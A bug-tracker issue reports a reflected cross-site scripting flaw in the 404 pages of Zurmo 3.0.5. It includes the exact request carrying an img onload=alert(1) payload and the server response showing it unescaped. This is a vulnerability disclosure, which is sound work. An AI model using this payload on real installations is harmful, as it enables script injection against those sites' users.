XSS in error response

Issue #375 new
Simon Waters created an issue

In a naive default install of the OpenSource Zurmo 3.0.5 on Debian Jessie it was noted that some 404 error messages are not properly escaped.

This fetch:

GET /app/index.php/accounts/default/autoCompletedcb81%3cimg%20src%3da%20onload%3dalert(1)%3e93a48?term=C HTTP/1.1

Resulted in reflected XSS attack in the 404 page.

I wondered if this might be fixed in later versions of YII framework as it wasn't immediately apparent that what is happening .

HTTP/1.0 404 Not Found
Date: Tue, 22 Dec 2015 00:34:58 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 218
Connection: close
Content-Type: text/html; charset=UTF-8

The system is unable to find the requested action "autoCompletedcb81<img src=a onload=alert(1)>93a48".<script>$('#zurmoSentryId').append('The reference id for this error is d1212d41ec9b45bb91201c6c52a4f98d.');</script>

Comments (0)

  1. Log in to comment